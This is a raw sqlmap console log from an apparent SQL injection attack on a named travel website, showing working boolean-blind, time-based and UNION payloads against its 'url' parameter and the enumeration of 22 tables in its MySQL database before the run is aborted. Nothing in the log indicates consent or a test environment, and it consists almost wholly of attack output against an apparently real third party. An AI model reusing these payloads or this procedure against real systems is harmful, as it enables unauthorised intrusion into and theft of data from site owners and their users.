nohup: ignoring input
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.8.13#dev}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:01:00 /2019-08-25/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[16:01:01] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.0.4) Gecko/20081029 Firefox/2.0.0.18' from file '/root/sqlmap/data/txt/user-agents.txt'
[16:01:01] [INFO] resuming back-end DBMS 'mysql' 
[16:01:01] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.jasminnetour.com'. Do you want to follow? [Y/n] Y
[16:01:04] [INFO] heuristics detected web page charset 'UTF-8-SIG'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: url (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: &url=5351 AND 1058=1058

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: &url=5351 AND (SELECT 1035 FROM (SELECT(SLEEP(5)))xdmS)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: &url=-6334 UNION ALL SELECT CONCAT(0x7170706271,0x667669427059526b4959564749724c456652775a59497046434b554975476554426e51494b637849,0x7171626a71)-- scmk
---
[16:01:05] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 8 or XP or 2003 or 2012
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.28, PHP, Microsoft IIS 8.0
back-end DBMS: MySQL >= 5.0.12
[16:01:05] [INFO] fetching tables for database: 'winasansapan'
[16:01:07] [WARNING] the SQL query provided does not return any output
[16:01:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:01:09] [INFO] heuristics detected web page charset 'ascii'
[16:01:09] [WARNING] the SQL query provided does not return any output
[16:01:09] [INFO] fetching number of tables for database 'winasansapan'
[16:01:09] [INFO] resumed: 22
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 10
[16:01:09] [INFO] resumed: lan_idioma
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 24
[16:01:09] [INFO] resumed: lan_idioma_subcat_idioma
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 11
[16:01:09] [INFO] resumed: lan_paginas
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 20
[16:01:09] [INFO] resumed: lan_persona_contacto
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 27
[16:01:09] [INFO] resumed: lan_persona_contacto_pagina
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 23
[16:01:09] [INFO] resumed: lan_subcategoria_idioma
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 39
[16:01:09] [INFO] resumed: lan_subcategoria_idioma_subsubcategoria
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 19
[16:01:09] [INFO] resumed: lan_subsubcategoria
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 10
[16:01:09] [INFO] resumed: tra_ciudad
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 24
[16:01:09] [INFO] resumed: tra_ciudad_subcat_ciudad
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 20
[16:01:09] [INFO] resumed: tra_cont_subcat_cont
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 14
[16:01:09] [INFO] resumed: tra_continente
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 15
[16:01:09] [INFO] resumed: tra_lan_usuario
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 17
[16:01:09] [INFO] resumed: tra_metatags_pais
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 11
[16:01:09] [INFO] resumed: tra_paginas
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 8
[16:01:09] [INFO] resumed: tra_pais
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 20
[16:01:09] [INFO] resumed: tra_pais_subcat_pais
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 20
[16:01:09] [INFO] resumed: tra_persona_contacto
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 28
[16:01:09] [INFO] resumed: tra_persona_contacto_paginas
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 23
[16:01:09] [INFO] resumed: tra_subcategoria_ciudad
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 27
[16:01:09] [INFO] resumed: tra_subcategoria_continente
[16:01:09] [INFO] retrieving the length of query output
[16:01:09] [INFO] resumed: 21
[16:01:09] [INFO] resumed: tra_subcategoria_pais
[16:01:09] [INFO] fetching columns for table 'lan_persona_contacto_pagina' in database 'winasansapan'
[16:01:11] [WARNING] the SQL query provided does not return any output
[16:01:11] [WARNING] unable to retrieve column names for table 'lan_persona_contacto_pagina' in database 'winasansapan'
do you want to use common column existence check? [y/N/q] N
[16:01:11] [WARNING] unable to enumerate the columns for table 'lan_persona_contacto_pagina' in database 'winasansapan', skipping
[16:01:11] [INFO] fetching columns for table 'tra_continente' in database 'winasansapan'
[16:01:13] [INFO] used SQL query returns 8 entries
[16:01:13] [INFO] starting 5 threads

[16:01:13] [INFO] waiting for threads to finish (Ctrl+C was pressed)
[16:01:13] [CRITICAL] user aborted (Ctrl+C was pressed multiple times)

[*] ending @ 16:01:13 /2019-08-25/

